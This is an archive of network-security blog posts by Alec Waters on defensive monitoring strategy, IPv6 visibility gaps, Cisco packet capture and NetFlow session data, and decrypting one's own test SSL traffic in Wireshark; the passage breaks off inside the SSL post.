Archive for the General Security Category

I love it when a plan comes together

Posted in General Security, NSM on 9 January, 2014 by Alec Waters

As defenders, we have many reasons to do our jobs. We want to comply with regulations, protect our employers (and protect our pay cheques!), and just maybe we enjoy the challenge despite the certain knowledge that someday an exploit with our name on it is going to smack us between the eyes.

The “why we do it” is therefore straightforward; what about the “how”? How do we defend? I don’t mean from a technical perspective – at a generic level, what are we trying to achieve?

There are certainly many answers to that question, but I quite like the idea that there are three mutually supporting objectives for defenders. The idea I’m presenting below is probably a little monitoring-centric, but then so am I!

At the top tier, there’s the “Defenders’ Utopia”, namely Prevent-It:

planaIt doesn’t matter what “It” is – if we can prevent all badness, we’ve won! Let’s patch stuff, pentest stuff, educate our users, harden our deployments, use SDL principles and products X, Y and Z to prevent all the badness, guaranteeing us “corporate security hero” status.

Prevent-It is therefore our “Plan A”. Sadly, it’s not enough because Prevention Eventually Fails – we need a Plan B.

preventioneventuallyfailsIf we can’t Prevent-It, Plan B should be to “Detect-It” in a timely fashion:

planabAnd no, third-party breach notification doesn’t count as “timely”! As well as responding to obvious indicators such as AV or IDS hits, we need to be proactive in detection by hunting through all of the instrumentation at our disposal looking for indicators like uncommon or never-before-seen events, unusual volumes of network traffic or event types, Bob logging in from Antigua when you know he’s in Scotland, etc. A solid ability to Detect-It will help you invoke the Intruder’s Dilemma.

“Detect-It” is bigger than “Prevent-It” in the diagram because prevention is hard, and we are more likely to be able to detect things than we are to prevent them if we try hard enough. Attackers have more tactics at their disposal than defenders have preventative measures so you need to be as thorough and as business-tailored as you can be in your monitoring. Know your infrastructure in as much detail as possible in terms of the platform (e.g., MVC app on IIS8 behind a Cisco ASA) and make certain it’s behaving as expected. For a self-contained security team, this latter part might be hard – I’d possibly venture the opinion that an app’s functional spec might be a useful thing for the security team to have. Should app X be sending emails? Doing FTP transfers? Talking to SkyDrive? If the security team don’t understand these details, they may miss things.

Eventually, you’ll likely run up against an attacker who slips past detection and conjures up the defenders’ nightmare of third-party breach notification – you’ve been compromised, you didn’t notice it happen, and now you’re front page news. Plan B has failed – your final recourse is Plan C:

planabc

If we can’t Prevent-It, and we didn’t Detect-It then we have to maintain the ability to Investigate-It. This bit’s biggest because it represents your gathering of logs, network traffic data and other indicators – your monumental programme of “hay collection” (the Detect-It part can be thought of as a “hay removal” process whose output is needles, if you follow my metaphor).

Even boring, routine logs may be worth their weight in gold when Investigating-It – collect as much as is feasible and legal. Even if we don’t have the resource to actually look at all the collected logs as a matter of course, at least we’ve got a huge pool of evidence to trawl through as part of the Incident Response process.

We can also use Investigate-It for retrospective analysis. If a new set of IOCs (Indicators of Compromise) comes to light, we can check them against what we’ve collected so far. Investigate-It also supports your corporate forensic readiness plan - knowing what information you need as part of IR, where to get it, and what you can get quickly without outside help is key.

Stairway to Heaven

If our org has sufficient resources we can move back up the stack, leveraging each tier to improve the one above. If we have an excellent capability to Investigate-It, it means we can improve our ability to Detect-It by hunting through the collected logs in different ways, producing more insightful reports/alerts/dashboards that pull together many disparate log sources. Lessons learned as part of Investigate-It can be incorporated into Detect-It – make sure that the indicators that were missed this time won’t be missed next time.

Moving up again, improving our ability to Detect-It can improve our ability to Prevent-It because we may discover things we don’t like that we can put a stop to before they become a problem (e.g. people emailing confidential docs to their personal email account so they can “work on them from home”, people logging in as local admin, people running apps you don’t like, why is there an active Bluetooth serial port on the CEO’s MacBook, etc) or we may even discover Existing Badness that we can zap.

So now we’re back at the top of the diagram, hopefully in better stead than before we started. Like I say, it’s a monitoring-centric way of looking at things, but if you’re in the game hopefully it’s an interesting perspective!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Hacker Countermeasures, 1984 style

Posted in General Security, Retro on 30 April, 2012 by Alec Waters

Some number of years ago, I was lucky enough to get a Sinclair ZX-81 for Christmas. There was much wonderment and joy to be had amid the frustration of RAM-pack wobble, the agonising waits for software to load from tape, and the never-ending search for a replacement keyboard that wasn’t as bad (or worse) than the original.

The best thing about the computers of olde was the built-in interpreter, usually for BASIC – here was an item of consumer electronics that wouldn’t do a single thing unless you told it to, an unthinkable concept to the marketeers of today. Putting in a tape and typing LOAD “” was the easy way out of this predicament; however, the real solution to the inert nature of your newly purchased box of future was to open the manual and learn how to code.

So learn we did. One day, my father proudly showed me a program he’d written – a version of the card game “snap”, with graphics and everything. After whiling away a good part of the afternoon playing, I looked over the source code. Showing an early leaning towards white-box pentesting, it didn’t take long to find a simple flaw. By simply keeping your finger pressed on your “snap” key (regardless of the two cards on the top of the deck) you could beat even the quickest opponent when a true “snap” finally came around. If both players were aware of this exploit (or “expliot” as I’d almost certainly have spelled it at the time) you had to make sure that you were player 2 since the subroutine that checked which key was pressed during a “snap” condition checked for player 2′s “snap” key before player 1′s.

Easily exploitable vulnerabilities? Some things never change, huh? In terms of Incident Detection, prime Indicators of Compromise included my little sister complaining to our parents that Daddy’s game was no fun because Alec always won.

To restore the game back to a test of speedy reactions my father rolled out some countermeasures in the form of a patch. The next time we played, my tactic resulted in the computer labelling me a cheat and docking me five cards every time I pressed my snap key when it wasn’t snap. To further add injury to insult, the losing player was crushed by a one-ton weight falling from the ceiling. I’m sure you can imagine what a terrifying visual experience this must have been, especially if you remember the graphics capabilities of the ZX-81…

To sample the full glory of this dance of measure and countermeasure, here’s the actual source code as submitted to ZX Computing magazine nearly thirty years ago. Lines 570 and 580 show the horrifying corpses of the losing players, squashed flat by Newtonian Justice From Above. Enjoy :)

Newtonian Justice from Above

Lines 570 and 580, Newtonian Justice from Above


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Quick Book Review – The Alexandria Project, by Andrew Updegrove

Posted in General Security on 19 April, 2012 by Alec Waters

THANK YOU FOR YOUR CONTRIBUTION TO THE ALEXANDRIA PROJECT

In a slight departure from my usual reading material of John le Carré and non-fiction technical tomes, I recently read The Alexandria Project by Andrew Updegrove; it turned out to be a nice mix of the two.

Without wishing to spill too many beans, it’s a fun read featuring mystery attackers with mystery motives, three-letter-agencies butting heads whilst manipulating people down their chosen path, military coups and crazy politicians with their finger on the Big Red Button.

The plot is spookily close to reality, especially in the Big Red Button department – I was reading the story on the actual dates featured in the book, at which time events were playing out on the world stage much as they were in my Kindle (plot spoiler, courtesy of BBC News, here). Coincidence? Or does Mr Updegrove have a crystal ball?

For the grand total of £1.95, you can’t really go wrong. Swing by Amazon and pick up a copy!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Next Generation Naughtiness at the Dead Beef Cafe

Posted in General Security, IPv6, Networking, NSM on 23 December, 2010 by Alec Waters

The IPocalypse is nearly upon us. Amongst the FUD, the four horsemen are revving up their steeds, each bearing 32 bits of the IPv6 Global Multicast Address of Armageddon, ff0e::dead:beef:666.

Making sure that the four horsemen don’t bust into our stables undetected is something of a challenge at the moment; IPv6 can represent a definite network monitoring blind spot or, at worst, an unpoliced path right into the heart of your network. Consider the following:

Routers and Firewalls

Although a router may be capable of routing IPv6, are all the features you use on the router IPv6-enabled? Is the firewall process inspecting IPv6 traffic? If it is, is it as feature-rich as the IPv4 equivalent (e.g., does it support application-layer inspection for protocols like FTP, or HTTP protocol compliance checking?)

End hosts

If you IPv6-enable your infrastructure, you may be inadvertently assigning internal hosts global IPv6 addresses (2001::) via stateless address autoconfiguration. If this happens (deliberately or accidentally), are the hosts reachable from the Internet directly? There’s no safety blanket of NAT for internal hosts like there is in IPv4, and if your network and/or host firewalls aren’t configured for IPv6 you could be wide open.

IDS/IPS

Do your IDS/IPS boxes support IPv6? Snort’s had IPv6 support since (I think) v2.8; the Cisco IPS products are also IPv6-aware, as I’m sure are many others.

Session tracking tools

SANCP has no IPv6 support; Argus does, as does cxtracker. netflow can also be configured to export IPv6 flows using v9 flow exports.

Reporting tools

Even if all of your all-seeing-eyes support IPv6, they’re of little use if your reporting tools don’t. Can your netflow analyser handle IPv6 exports? What about your IDS reporting tools – are they showing you alerts on IPv6 traffic? What about your expensive SIEM box?

The IPv6 Internet is just as rotten as the IPv4 one

We’ve seen some quite prolific IPv6 port scanning just as described here, complete with scans of addresses like 2001:x:x:x::c0:ffee and 2001:x:x:x::dead:beef:cafe. The same scanning host also targeted UDP/53 trying to resolve ‘localhost’, with the same source port (6689) being used for both TCP and UDP scans. I have no idea if this is reconnaissance or part of some kind of research project, but there were nearly 13000 attempts from this one host in the space of about three seconds.

Due to the current lack of visibility into IPv6, it can also make a great bearer of covert channels for an attacker or pentester. Even if you’re not running IPv6 at all, an attacker who gains a foothold within your network could easily set up a low-observable IPv6-over-IPv4 tunnel using one of the many IPv6 transition mechanisms available, such as 6in4 (uses IPv4 protocol 41) or Teredo (encapsulates IPv6 in UDP, and can increase the host’s attack surface by assigning globally routable IPv6 addresses to hosts behind NAT devices, which are otherwise mostly unreachable from the Internet).

The IPocalypse is coming…

…that’s for certain; we just have to make sure we’re ready for it. Even if you’re not using IPv6 right now, you probably will be to some degree a little way down the road. Now’s the time to check the capability of your monitoring infrastructure, and to conduct a traffic audit looking for tunneled IPv6 traffic. Who knows what you might find!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part two – session data

Posted in Cisco, General Security, NSM on 26 October, 2010 by Alec Waters

In part one, I covered how to use Cisco routers and firewalls to perform full packet capture. This exciting installment will cover how to get network session data out of these devices.

Network session data can be likened to a real-world itemised telephone bill. It tells you who “called” who, at what times, for how long, and how much was said (but not what was said). It’s an excellent lightweight way to see what’s going on armed only with a command prompt.

There are several ways to extract such information from Cisco kit; we’ll look at each in turn, following Part One’s support/troubleshooting/IR scenario of accessing remote devices where you’re not able to make topological changes or install any extra software or hardware.

Netflow

The richest source of session information on Cisco devices is Netflow (I’ll leave it to Cisco to explain how to turn it on). If you’re able to set up a Netflow collector/analyser (like this one (free for two-interface routers), or many others) you can drill down into your session info as far as you like. If you haven’t got an analyser or you can’t install one in time of need, it’s still worth switching on Netflow because you can interrogate the flow cache from the command line.

The command is “show ip cache flow”, and the output is split into two parts. The first shows some statistical information about the flows that the router has observed:

router#sh ip cache flow
IP packet size distribution (3279685 total packets):
 1-32   64   96  128  160  192  224  256  288  320  352  384  416  448  480
 .000 .184 .182 .052 .072 .107 .004 .005 .000 .000 .000 .000 .000 .000 .000

 512  544  576 1024 1536 2048 2560 3072 3584 4096 4608
 .000 .000 .001 .020 .365 .000 .000 .000 .000 .000 .000

IP Flow Switching Cache, 278544 bytes
 57 active, 4039 inactive, 418030 added
 10157020 ager polls, 0 flow alloc failures
 Active flows timeout in 1 minutes
 Inactive flows timeout in 15 seconds
IP Sub Flow Cache, 34056 bytes
 57 active, 967 inactive, 418030 added, 418030 added to flow
 0 alloc failures, 0 force free
 1 chunk, 1 chunk added
 last clearing of statistics never
Protocol     Total    Flows   Packets Bytes  Packets Active(Sec) Idle(Sec)
--------     Flows     /Sec     /Flow  /Pkt     /Sec     /Flow     /Flow
TCP-WWW       6563      0.0       186  1319      1.2       4.7       1.4
TCP-other    16163      0.0         1    47      0.0       0.0      15.4
UDP-DNS         12      0.0         1    67      0.0       0.0      15.6
UDP-NTP       1010      0.0         1    76      0.0       0.0      15.0
UDP-Frag         2      0.0         6   710      0.0       0.2      15.3
UDP-other   316602      0.3         2   156      0.8       0.6      15.4
ICMP         31165      0.0         6    63      0.2      53.4       2.2
IP-other     46438      0.0        21   125      1.0      58.0       2.1
Total:      417955      0.4         7   574      3.3      11.0      12.7

In absence of a graphical Netflow analyser, the Packets/Sec counter is a good barometer of what’s “using up all the bandwidth”. To clear the stats so that you can establish a baseline, you can use the command “clear ip flow stats”.

After the stats comes a listing of all the flows currently being tracked by the router:

SrcIf     SrcIPaddress    DstIf     DstIPaddress    Pr SrcP DstP  Pkts
Fa4       xxx.xxx.xxx.xxx Local     yyy.yyy.yyy.yyy 32 3FAF 037C    16
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
Tu100     10.7.1.250      BV3       10.4.1.3        06 0050 C0AC   120
BV3       10.4.1.3        Tu100     10.7.1.250      06 C0AC 0050   116
Tu100     192.168.88.20   Local     172.16.7.10     01 0000 0800     5
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
Fa4       bbb.bbb.bbb.bbb BV3       yyy.yyy.yyy.yyy 06 0050 C0A0     1
BV3       10.4.1.3        Fa4       ddd.ddd.ddd.ddd 06 C07E 0050     1
Tu100     192.168.88.56   Local     172.16.7.10     06 8081 0016     7
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763
Tu100     192.168.88.28   Local     172.16.7.10     11 04AC 00A1     1
Tu100     192.168.88.28   Local     172.16.7.10     11 04A6 00A1     1
Fa4       aaa.aaa.aaa.aaa Local     yyy.yyy.yyy.yyy 32 275F BD8A     5
Fa4       ccc.ccc.ccc.ccc Local     yyy.yyy.yyy.yyy 32 97F1 E9BE     5
Tu100     10.7.1.242      Local     172.16.7.10     01 0000 0000     3
Fa4       ddd.ddd.ddd.ddd BV3       yyy.yyy.yyy.yyy 06 0050 C07E     1

The tempting simplicity of the table above hides a plethora of gotchas for the unwary:

  • The Pr (IP protocol number),  SrcP (source port) and DstP columns are in hex, but we can all do the conversion in our heads, right? ;)
  • Netflow is a unidirectional technology. That means that if hosts A and B are talking to one another via a single TCP connection, two flows will be logged – one for A->B and one for B->A. For example, these two rows in the table above are talking about the same TCP session (the four-tuple of addresses and ports is the same for both rows):
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
  • Unless you configure it otherwise, Netflow is an ingress technology. This means that flows are accounted for as they enter the router, not as they leave. You can determine what happens on the egress side of things because when a flow is accounted for the output interface is determined by a FIB lookup and placed in the DstIf column; in this way, you can track a flow’s path through the router. I mention this explicitly because…
  • Netflow does not sit well with NAT. Take a look at these two rows, which represent an HTTP download (port 0×0050 is 80 in decimal) requested of non-local server zzz.zzz.zzz.zzz by client 10.4.1.3:
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763

So what’s yyy.yyy.yyy.yyy, then? It’s the NAT inside global address representing 10.4.1.3. As Netflow is unidirectional and is recorded as it enters an interface, the returning traffic from zzz.zzz.zzz.zzz will have the post-NAT yyy.yyy.yyy.yyy as its destination address, and will be recorded as such.

Provided that you keep that lot in mind, the flow cache is a powerful tool to explore the traffic your router is handling.

NAT translations

A typical border router may well perform NAT/PAT tasks. If so, you can use the NAT database as a source of session information. On a router, the command is “show ip nat translations [verbose]“; on a PIX/ASA, it’s “show xlate [debug]“:

router#show ip nat translations
Pro Inside global         Inside local   Outside local    Outside global
tcp yyy.yyy.yyy.yyy:49314 10.4.1.3:49314 94.42.37.14:80   94.42.37.14:80
tcp yyy.yyy.yyy.yyy:49316 10.4.1.3:49316 92.123.68.49:80  92.123.68.49:80

If you’ve got a worm on your network that’s desperately trying to spread, chances are you’ll see a ton of NAT translations (which could overwhelm a small router). Rather than paging through thousands of lines of output, you can just ask the device for some NAT statistics. On a router, it’s “show ip nat statistics”; on a PIX/ASA, it’s “show xlate count”.

Keeping tabs on the number of active NAT translations is a worthwhile thing to do. I wrote a story for Security Monkey’s blog a while back which tells the tale of a worm exhausting a router’s memory with NAT translations; you can even graph the number of translations to look for anomalies over time.

Firewall sessions

Another way of extracting session information is to ask the router or PIX about the sessions it is currently tracking for firewall purposes. On a router it’s “show ip inspect sessions [detail]“; on the PIX/ASA, it’s “show conn [detail]“.

router#show ip inspect sessions detail
Established Sessions
 Session 842064A4 (10.4.1.3:49446)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:58
  Bytes sent (initiator:responder) [440:4269]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49446:49446] on ACL outside-fw (6 matches)
 Session 84206FC4 (10.4.1.3:49443)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:59
  Bytes sent (initiator:responder) [440:2121]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49443:49443] on ACL outside-fw (4 matches)
 Session 8420728C (10.4.1.3:49436)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:01:01, Last heard 00:00:50
  Bytes sent (initiator:responder) [1343:48649]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49436:49436] on ACL outside-fw (44 matches)

This has the advantage of not being complicated by NAT, but still showing useful bytecounts and session durations.

Last resorts

If none of the above can help you out, there are a couple of last resort options open to you. The first of these is the “ip accounting” interface configuration command on IOS routers. To quote Cisco:

The ip accounting command records the number of bytes (IP header and data) and packets switched through the system on a source and destination IP address basis. Only transit IP traffic is measured and only on an outbound basis; traffic generated by the router access server or terminating in this device is not included in the accounting statistics. Traffic coming from a remote site and transiting through a router is also recorded.

Also note that this command will likely have a performance impact on the router. You may end up causing more problems than you solve by using this! The output of “show ip accounting” will look something like this:

router# show ip accounting
 Source          Destination            Packets      Bytes
 172.16.19.40    192.168.67.20          7            306
 172.16.13.55    192.168.67.20          67           2749
 172.16.2.50     192.168.33.51          17           1111
 172.16.2.50     172.31.2.1             5            319
 172.16.2.50     172.31.1.2             463          30991
 172.16.19.40    172.16.2.1             4            262

If “ip accounting” was a last resort, “debug ip packet” is what you’d use as an even lasterer resort, so much so that I leave it as an exercise for the reader to find out all about it. Don’t blame me when your router chokes to the extent that you can’t even enter “undebug all”…!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part one

Posted in Cisco, General Security, NSM on 11 August, 2010 by Alec Waters

Knowing what your network is doing is central to the NSM doctrine, and the usual method of collecting NSM data is to attach a sensor of some kind to a tap or a span port on a switch.

But what if you can’t do this? What if you need to see what’s going on on a network that’s geographically remote and/or unprepared for conventional layer-2 capture? Quite a bit, as it turns out.

In the first of a two-part post, the Cisco Kid (i.e., me) is going to walk you through a number of ways to use an IOS router or ASA/PIX firewall to perform full packet capture. The two product sets have different capabilities and limitations, so we’ll look at each in turn.

PIX/ASA

Full packet capture has been supported on these devices for many years, and it’s quite simple to operate. Step one is to create an ACL that defines the traffic we’re interested in capturing – because all of the captures are stored in memory, we need to be as specific as we can otherwise we’ll be using scarce RAM to capture stuff we don’t care about.

Let’s assume we’re interested in POP3 traffic. Start by defining an ACL like this:

pix(config)# access-list temp-pop3-acl permit tcp any eq 110 any
pix(config)# access-list temp-pop3-acl permit tcp any any eq 110

Note that we’ve specified port 110 as the source or the destination – we wouldn’t want to risk only capturing one side of the conversation.

Now we can fire up the capture, part of which involves specifying the size of the capture buffer. Remembering that this will live in main memory, we’d better have a quick check to see how much is going spare:

pix# show memory
Free memory:        31958528 bytes (34%)
Used memory:        60876368 bytes (66%)
Total memory:       92834896 bytes (100%)

Plenty, in this case. Let’s start the capture:

pix# capture temp-pop3-cap access-list temp-pop3-acl buffer 1024000 packet-length 1514 interface outside-if circular-buffer

This command gives us a capture called temp-pop3-cap, filtered using our ACL, stored in a one-meg (circular) memory buffer, that will capture frames of up to 1514 bytes in size from the interface called outside-if. If you don’t specify a packet-length, you won’t end up capturing entire frames.

Now we can check that we’re actually capturing stuff:

pix# show capture temp-pop3-cap
5 packets captured
1: 12:22:02.410440 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: S 3534424301:3534424301(0) win 65535 <mss 1260,nop,nop,sackOK>
2: 12:22:02.411401 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: S 621655548:621655548(0) ack 3534424302 win 16384 <mss 1380,nop,nop,sackOK>
3: 12:22:02.424691 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: . ack 621655549 win 65535
4: 12:22:02.425515 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: P 621655549:621655604(55) ack 3534424302 win 65535
5: 12:22:02.437462 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: P 3534424302:3534424308(6) ack 621655604 win 65480

To get the capture off the box and into Wireshark, point your web browser at the PIX/ASA like this, specifying the capture’s name in the URL:

https://yourpix/admin/capture/temp-pop3-cap/pcap

Don’t forget the /pcap on the end, or you’ll end up downloading only the output of the ‘show capture temp-pop3-cap’ command.

To clean up, you can use the ‘clear capture’ command to empty the capture buffer (but still keep on capturing) and the ‘no capture’ command to destroy the buffer and stop capturing altogether.

Provided one is careful with the size of the capture buffer, it’s nice and easy, it works, and it’s quick to implement in an emergency. If you’re using the ASDM GUI, Cisco have a how-to here that will walk you through the process.

IOS routers

As we’ll see, things aren’t quite as nice in IOS land, but there’s still useful stuff we can do. As of 12.4(20)T, IOS supports the Embedded Packet Capture feature (EPC) which at first glance seems to be equivalent to the PIX/ASA’s capture feature. Again, we’ll start by creating an ACL for capturing POP3 traffic:

router(config)#ip access-list extended temp-pop3-acl
router(config-ext-nacl)#permit tcp any eq 110 any
router(config-ext-nacl)#permit tcp any any eq 110

Now we can set up the capture. This involves two steps, setting up a capture buffer (where to store the capture) and a capture point (where to capture from). The capture buffer is set up like this:

router#monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular

Here is where Cisco seem to have missed a trick. The ‘size’ parameter refers to the buffer size in kilobytes, and 512 is the maximum. That’s “Why???” #1 – 512KB seems like a very low limit to place on a capture buffer. “Why???” #2 is the ‘max-size’ parameter, which refers to the amount of bytes in each frame that will be captured; 1024 is the maximum, well below ethernet’s 1500 byte MTU. So we seem to be limited in that we can capture only a small amount of incomplete frames, which isn’t really in the spirit of “full” packet capture…

Sighing deeply, we move on to setting up the buffer’s filter using our ACL:

router#monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

Next, we create a capture point. This specifies where the frames will be captured, both from an interface and an IOS architecture point of view:

router#monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

‘ip cef’ means we’re interested in capturing CEF-switched frames as opposed to process-switched ones, so if traffic you’re expecting to see in the buffer isn’t there it could be that the router process switched it thus avoiding the capture point. The capture interface is specified, as is ‘both’ which means we’re interested in ingress and egress traffic.

Next (we’re almost there) we have to associate a buffer with a capture point:

router#monitor capture point associate temp-pop3-point temp-pop3-buffer

Now we can check our work before we start the capture:

router#show monitor capture buffer temp-pop3-buffer parameters
Capture buffer temp-pop3-buffer (circular buffer)
Buffer Size : 524288 bytes, Max Element Size : 1024 bytes, Packets : 0
Allow-nth-pak : 0, Duration : 0 (seconds), Max packets : 0, pps : 0
Associated Capture Points:
Name : temp-pop3-point, Status : Inactive
Configuration:
monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular
monitor capture point associate temp-pop3-point temp-pop3-buffer
monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

router#sh monitor capture point temp-pop3-point
Status Information for Capture Point temp-pop3-point
IPv4 CEF
Switch Path: IPv4 CEF            , Capture Buffer: temp-pop3-buffer
Status : Inactive
Configuration:
monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

Start the capture:

router#monitor capture point start temp-pop3-point

And make sure we’re capturing stuff:

router#show monitor capture buffer temp-pop3-buffer dump
<frame by frame raw dump snipped>

When we’re done, we can stop the capture:

router#monitor capture point stop temp-pop3-point

And finally, we can export it off the box for analysis:

router#monitor capture buffer temp-pop3-buffer export tftp://10.1.8.6/temp-pop3.pcap

…and for all that work, we’ve ended up with a tiny pcap containing truncated frames. Better than nothing though!

However, there is a second option for IOS devices, provided that you have a capture workstation that’s on a directly attached ethernet subnet. It’s called Router IP Traffic Export (RITE), and will copy nominated packets and send them off-box to a workstation running Wireshark or similar (or an IDS, etc.). Captures therefore do not end up in a memory buffer, and it is the responsibility of the workstation to capture the exported packets and to work out which packets were actually exported from the router and which are those sent or received by the workstation itself.

After carefully reading the restrictions and caveats in the documentation, we can start by setting up a RITE profile. This defines what we’re going to monitor, and where we’re going to export the copied packets:

router#ip traffic-export profile temp-pop3-profile
# Set the capture filter
router(conf-rite)#incoming access-list temp-pop3-acl
router(conf-rite)#outgoing access-list temp-pop3-acl
# Specify that we want to capture ingress and egress traffic
router(conf-rite)#bidirectional
# The capture workstation lives on the subnet attached to Gi0/0.2
router(conf-rite)#interface GigabitEthernet 0/0.2
# And the workstation’s MAC address is:
router(conf-rite)#mac-address hhhh.hhhh.hhhh

Finally, we apply the profile to the interface from which we actually want to capture packets:

router(config)#interface GigabitEthernet 0/0.2
router(config-subif)#ip traffic-export apply temp-pop3-profile

If all’s gone well, the capture workstation on hhhh.hhhh.hhhh should start seeing a flow of POP3 traffic. We can ask the router how it’s getting on, too:

router#show ip traffic-export
Router IP Traffic Export Parameters
Monitored Interface         GigabitEthernet0/0
Export Interface                GigabitEthernet0/0.2
Destination MAC address hhhh.hhhh.hhhh
bi-directional traffic export is on
Output IP Traffic Export Information    Packets/Bytes Exported    19/1134

Packets Dropped           17877
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Input IP Traffic Export Information     Packets/Bytes Exported    27/1169

Packets Dropped           12153
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Profile temp-pop3-profile is Active

You get full packets captured (note packets, not frames – the encapsulating Ethernet frame isn’t the same as the original, in that it has the router’s MAC address as the source and the capture workstation’s MAC address as the destination), and provided you’re local to the router and can afford the potential performance hit on the box, it’s quite a neat way to perform an inline capture. Furthermore, this may be your only capturing option sometimes – granted, the capture workstation has to be on a local ethernet segment, but the traffic profile itself can be applied to other kinds of circuit for which you may not have a tap (ATM, synchronous serial, etc.). It’s a very useful tool.

In the next exciting installment, the Cisco Kid will look at ways of extracting network session information from IOS routers, PIXes and ASAs.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Decrypting SSL traffic with Wireshark, and ways to prevent it

Posted in Crypto, General Security on 20 July, 2010 by Alec Waters

A neat feature of Wireshark is the ability to decrypt SSL traffic. This post is about why you might want to do it, how to do it, why it works, and how to decrease the chances of other people being able to decrypt your “secure” traffic.

Why decrypt SSL?

Aside from the obvious malicious uses, decrypting SSL has uses such as:

  • Debugging applications that run over SSL (HTTP, SMTP, POP3, IMAP, FTP, etc).
  • Feeding a decrypted traffic stream to an IDS. Having the best signatures in the world won’t help if all your sensors see is encrypted traffic.
  • Learning about SSL. What better way to understand something than to take it apart and put it back together again?

Sponsor Alec!
I’m running the 2012 Brighton Half Marathon in aid of Help for Heroes – please sponsor me if you can by clicking the link to the right:

How to decrypt SSL with Wireshark

Step one – set up an SSL-protected server to use as a testbed

To illustrate the process, we’re going to use OpenSSL to generate a certificate and act as a web server running HTTP over SSL (aka HTTPS) – it’s quite straightforward.

To begin with, we need to get ourselves a self-signed certificate that our HTTPS server can use. We can do this with a single command:

openssl req -x509 -nodes -newkey rsa:1024 -keyout testkey.pem -out testcert.pem

OpenSSL will ask you for some input to populate your certificate with; once you’ve answered all the questions, the output of this command is two files, testkey.pem (containing a 1024 bit RSA private key) and testcert.pem (containing a self signed certificate). PEM (Privacy Enhanced Mail) format files are plaintext, and consist of a BASE64 encoded body with header and footer lines. You can look at the contents of your key and certificate files in more detail like this:

openssl rsa -in testkey.pem -text -noout (output here)
openssl x509 -in testcert.pem -text -noout (output here; more info here)

We need to perform one tiny tweak to the format of the private key file (Wireshark will use this later on, and it won’t work properly until we’ve done this):

openssl rsa -in testkey.pem -out testkey.pem

Now we’re ready to fire up our HTTPS server:

openssl s_server -key testkey.pem -cert testcert.pem -WWW -cipher RC4-SHA -accept 443

The -key and -cert parameters to the s_server command reference the files we’ve just created, and the -WWW parameter (this one is case sensitive) causes OpenSSL to act like a simple web server capable of retrieving files in the current directory (I created a simple test file called myfile.html for the purposes of the test).

The -cipher parameter tells the server to use a particular cipher suite – I’m using RC4-SHA because that’s what’s used when you go to https://www.google.com. The RC4-SHA cipher suite will use RSA keys for authentication and key exchange, 128-bit RC4 for encryption, and SHA1 for hashing.

Having got our server up and running, we can point a browser at https://myserver/myfile.html and retrieve our test file via SSL (you can ignore any warnings about the validity of the certificate). If you’ve got this working, we can move on to…

Step two – capture some traffic with Wireshark

Fire up Wireshark on the server machine, ideally with a capture filter like “tcp port 443″ so that we don’t capture any unnecessary traffic. Once we’re capturing, point your browser (running on a different machine) at https://myserver/myfile.html and stop the capture once it’s complete.

Right-click on any of the captured frames and select “Follow TCP stream” – a window will pop up that’s largely full of SSL-protected gobbledegook:

Step three – configuring Wireshark for decryption

Close the TCP Stream window and select Preferences from Wireshark’s Edit menu. Expand the “Protocols” node in the tree on the left and scroll down to SSL (in newer versions of Wireshark, you can open the node and type SSL and it will take you there).

Once SSL is selected, there’s an option on the right to enter an “RSA keys list”. Enter something like this:

10.16.8.5,443,http,c:\openssl-win32\bin\testkey.pem

You’ll need to edit the server IP address and path to testkey.pem as appropriate. If this has worked, we’ll notice two things:

  • Wireshark’s SSL dissector can look into otherwise encrypted SSL packets and dissect the protocol inside:
  • We can right-click on any of the captured frames that are listed as SSL or TLS and select “Follow SSL stream”:

Nice :)

You can read about this step in the Wireshark Wiki here.

Why it works

So, why does this work? Our test server, in common with a very large proportion of HTTP-over-SSL webservers, is using RSA to exchange the symmetric session key that will be used by the encryption algorithm (RC4 in this case). Below is an extract from RFC2246:

F.1.1.2. RSA key exchange and authentication

With RSA, key exchange and server authentication are combined. The public key may be either contained in the server’s certificate or may be a temporary RSA key sent in a server key exchange message.

After verifying the server’s certificate, the client encrypts a pre_master_secret with the server’s public key.

